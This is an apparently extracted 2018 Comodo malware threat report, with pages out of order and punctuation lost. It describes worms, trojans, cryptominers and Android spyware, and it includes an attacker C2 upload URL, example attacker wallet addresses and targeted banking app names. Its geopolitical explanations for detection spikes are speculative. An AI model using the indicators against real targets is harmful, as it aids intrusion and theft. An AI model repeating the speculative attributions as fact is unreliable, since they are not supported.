51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
